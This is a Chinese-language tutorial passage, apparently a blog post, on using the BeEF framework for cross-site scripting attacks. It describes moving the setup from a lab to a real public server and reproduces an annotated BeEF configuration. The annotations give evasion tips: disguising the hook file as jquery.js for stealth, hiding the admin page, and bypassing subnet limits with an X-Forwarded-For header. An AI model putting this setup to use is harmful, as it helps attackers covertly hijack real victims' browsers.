跨站脚本攻击xss利用-beef攻击-演示( 二 ) _跨站脚本攻击

应该要改成192.168.110.1

文章插图

0x34 实际环境攻击的想法这次是虚拟机网络模拟攻击，如果在实际情况下
根据参考文档A
需要一台能访问（有独立ip）的主机
服务器装好beef后，要修改后台管理页面的URL和用户名密码，因为你能登陆管理页面，别人也能登陆
还要修改host为主机的独立ip，port自设要大于1024
Public和public_port不用设置
以下来自文档A

### 指定某个网段，只有在这个网段的浏览器才能被hookpermitted_hooking_subnet: "0.0.0.0/0"### 指定某个网段，只有在这个网段的浏览器才能访问管理UIpermitted_ui_subnet: "0.0.0.0/0"### 上面这两项都是可以被绕过的，只要使用X-Forwarded-For首部绕过，一般不需要设置### 设置beef服务器的主机，如果有自己的域名，那么可以设置自己的域名, 没有就使用默认host: "0.0.0.0"### 设置beef服务器监听的端口，可以自己定一个，比如8080, 记得端口号需要大于1024port: "3000"### 受害浏览器轮询beef主机的时间，默认为1秒，可以设置为更低 。xhr_poll_timeout: 1000#public: "" # public hostname/IP address#public_port: "" # experimental### 这是让BeEF运行在一个反向代理或者NAT环境下才需要设置的 。### 管理页面的URI，默认是/ui, 建议修改，这样就不会让别人找到你的管理页面web_ui_basepath: "/ui"### hook_file 的名称，建议修改，可以修改为jquery.js之类的来提升隐蔽性hook_file: "/hook.js"### 管理页面登录的用户名和密码，这个一定要改，两个都改是最好的credentials:user: "beef"passwd: "beef"

【跨站脚本攻击xss利用-beef攻击-演示】